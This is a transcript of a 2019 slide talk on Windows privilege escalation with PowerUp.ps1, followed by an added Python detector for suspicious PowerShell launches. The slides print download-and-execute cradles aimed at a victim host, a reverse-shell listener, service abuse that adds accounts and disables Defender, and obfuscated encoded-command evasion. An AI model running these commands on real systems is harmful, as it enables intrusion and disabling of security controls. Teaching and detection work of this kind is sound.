20190905_Powershell_Privilege_escalation

Aqua
September 05, 2019


Transcript

  1. PowerShell Privilege escalation using PowerUp.ps1 September 5, 2019

  2. Self introduction
     • Name : Magical analyze girl Aqua(•̀ ᴗ•́ )و
     • Job : Magical girl
     • Twitter : @WinterLabyrinth
     • Discord : Aqua#6654
     • Dream : Reborn in another world
     • Friend : Malware
     • Favorite Manga : Kings’ Viking
     • Favorite Anime : Terror in Resonance, Saga of Tanya the Evil
  3. Self introduction – My favorite anime • Terror in Resonance

  4. Self introduction – My favorite anime • Saga of Tanya the Evil
  5. Agenda
     • About PowerShell
     • Get low level account
     • About privilege escalation
     • Privilege escalation
     • Magical weapon (Tools)
     • Demo
     • Reference
     • More interesting
  6. About PowerShell
     • CUI based on .NET Framework and .NET Core
     • Installed by default since Windows 7
     • Cmdlets use verb-noun names to reduce command memorization
     • PowerShell uses a "verb-noun" naming system.
     • Example:
       • cd -> Set-Location
       • cat, type -> Get-Content
     • Aliases are also registered (Check : > alias)
     • Script : *.ps1
  7. Get low level account
     • I will not explain much here, because there are many.
     • Is there a vulnerability in a service running on the system?
     • If you are in an environment where your code can run, it is best to get a reverse shell.
     • Exploit Database will help you (https://www.exploit-db.com/)
     • If you install a reverse TCP payload using some kind of vulnerability, the TCP connection will return to your server.
     • PayloadsAllTheThings, or the MSFVenom Cheatsheet (this uses Meterpreter) (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
     • Your server (listen) : $ nc -lvnp 4444 # listen on port 4444
  8. About privilege escalation
     • Privilege escalation means that a general user gains higher privileges, such as administrator.
     • Example : Dirty Cow CVE-2016-5195 (https://www.exploit-db.com/exploits/40847, etc)
     • Sorry for the Linux environment. It was the most affordable. The same applies to Windows.
  9. Magical weapon
     • Magical weapon (Tools)
       • PowerSploit (https://github.com/PowerShellMafia/PowerSploit)
       • PowerTools (https://github.com/PowerShellEmpire/PowerTools)
       • Nishang (https://github.com/samratashok/nishang)
       • RedTeam_CheatSheet.ps1 (https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70)
       • Easy-P (from The Hacker Playbook)
  10. Magical weapon (PowerSploit/Privesc/PowerUp.ps1)
      • If you are connected to the Internet, you can download it from GitHub
        PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks
      • The most common way I end up using PowerUp is by using the Invoke-AllChecks function, which runs through all relevant checks for the machine and outputs a status report:
  11. Magical weapon (PowerSploit/Privesc/PowerUp.ps1)
      • Download the PowerShell script on your server
      • By passing the -ExecutionPolicy option to the PowerShell command, you can temporarily change the execution policy and execute the script.
      • Your server : $ python -m SimpleHTTPServer 80
      • Victim Server (cmd.exe) :
        > Powershell.exe -nop -exec bypass -w hidden -c "iex (New-Object Net.WebClient).DownloadString('http://<LHOST>/PowerUp.ps1'); Invoke-AllChecks"
        powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
      • About PowerShell.exe - Microsoft Docs
        • -noni = -NonInteractive
        • -nop = -NoProfile
        • -exec = -ExecutionPolicy
        • -W Hidden = -WindowStyle Hidden
        • -C = -Command
  12. Magical weapon (PowerSploit/Privesc/PowerUp.ps1)
      • Example Usage
        1. C:\> powershell.exe -nop -exec bypass
        2. PS C:\> Import-Module PowerUp.ps1
        3. PS C:\> Invoke-AllChecks
        4. If an Abuse Function is found
           1. Adding a new user with a password using the -User and -Password options
              PS C:\> Invoke-ServiceAbuse -Name '<AbuseService>' -User <User> -Password <Password>
           2. Running a custom command (Disable Windows Defender)
              PS C:\> Invoke-ServiceAbuse -Name '<AbuseService>' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        5. PS C:\> Restart-Computer -Force
  13. Magical weapon (tips)
      • File download (victim side)
        powershell -nop -exec bypass -w hidden -c "iex (New-Object System.Net.WebClient).DownloadFile('http://<LHOST>/file', 'C:\Users\user\Downloads\file')"
        Note : It was necessary to specify the download path.
      • Advanced
        • iex = Invoke-Expression
        • Filter bypass
          • -enc <base64 text>
          • PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd <base64 text>
  14. Demo Umm..

  15. Demo • Get password. I used this information to get the Administrator shell.
  16. Demo Umm.. I don't know about DLL injection.

  17. Reflection • However, this is only a touch of PowerUp.ps1. I will continue my research. Let's verify together. PowerSploit has many tools
  18. More interesting… But PowerUp.ps1 may have little to do with

  19. Magical weapon (Windows-Exploit-Suggester)
      • Usage
        • (Victim Windows) C:\> systeminfo >> systeminfo.txt
        • $ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
        • $ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows server 2008 r2'
  20. Magical weapon (Windows-Exploit-Suggester) • I tested on Windows 7 Service Pack 1
  21. Magical weapon (Windows-Exploit-Suggester)
      • I used MS14-040
      • CVE-2014-1767
      • 'afd.sys' Dangling Pointer Privilege Escalation
  22. Playground
      • Hack The Box is a great place to learn privilege escalation.
      • There are also attacks on boxes using vulnerabilities.
  23. Reference
      • PowerUp: A Usage Guide (https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/)
      • Advanced PowerUp.ps1 Usage (https://recipeforroot.com/advanced-powerup-ps1-usage/)
      • Privilege Escalation Using PowerShell (https://hacknpentest.com/windows-privilege-escalation-using-powershell/)
  24. More interesting
      • Window Privilege Escalation via Automated Script (https://www.hackingarticles.in/window-privilege-escalation-via-automated-script/)
      • Windows Privilege Escalation Scripts & Techniques (https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194)
  25. Thanks for Listening.
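
Added example (not part of the original deck): the launch flags from slides 11 and 13, seen from the detection side. It normalizes abbreviated, mixed-case and alternate-dash powershell.exe switches found in process-creation command lines and flags the download cradle; the finding labels, the sample lines and the 192.0.2.10 address are constructed, and the shortest-prefix table is an assumption.

```python
import base64
import re

# Switch -> shortest prefix powershell.exe accepts (assumed from its documented abbreviations).
SWITCHES = {"executionpolicy": "ex", "noprofile": "nop", "windowstyle": "w", "encodedcommand": "e"}
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
DASHES = "-/\u2013\u2014\u2015"  # hyphen, slash, en dash, em dash, horizontal bar
CRADLE = re.compile(r"\b(iex|invoke-expression)\b.*\.download(string|file|data)\(", re.I | re.S)

def resolve_switch(token):
    """Map '-nop', '-eXecUtiONPoLICy', '-enc' and so on to the full switch name."""
    if len(token) < 2 or token[0] not in DASHES:
        return None
    key = ALIASES.get(token[1:].lower(), token[1:].lower())
    for full, shortest in SWITCHES.items():
        if full.startswith(key) and len(key) >= len(shortest):
            return full
    return None

def analyze(cmdline):
    """Return sorted findings for one process-creation command line."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens or not re.search(r"powershell(\.exe)?$", tokens[0], re.I):
        return []
    findings, text = set(), cmdline
    for i, tok in enumerate(tokens[1:], start=1):
        name = resolve_switch(tok)
        arg = tokens[i + 1] if i + 1 < len(tokens) else ""
        if name == "executionpolicy" and arg.lower() in ("bypass", "unrestricted"):
            findings.add("execpolicy:" + arg.lower())
        elif name == "windowstyle" and arg.lower() == "hidden":
            findings.add("hidden-window")
        elif name == "noprofile":
            findings.add(name)
        elif name == "encodedcommand":
            findings.add("encoded-command")
            try:  # the argument is base64 of UTF-16LE text; scan the decoded form too
                text += "\n" + base64.b64decode(arg, validate=True).decode("utf-16-le")
            except ValueError:
                findings.add("undecodable-payload")
    if CRADLE.search(text):
        findings.add("download-cradle")
    return sorted(findings)

SAMPLES = [  # constructed command lines; 192.0.2.10 is a documentation address
    "Powershell.exe -nop -exec bypass -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/PowerUp.ps1'); Invoke-AllChecks\"",
    "PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden \u2013EnCodeDcOmmAnd " + base64.b64encode("Write-Output constructed-sample".encode("utf-16-le")).decode(),
    "powershell.exe -File C:\\Scripts\\backup.ps1",
]
```

Feed analyze() the command-line field from process-creation logging; matching on the resolved switch name rather than the literal string is what catches the mixed-case variant from slide 13.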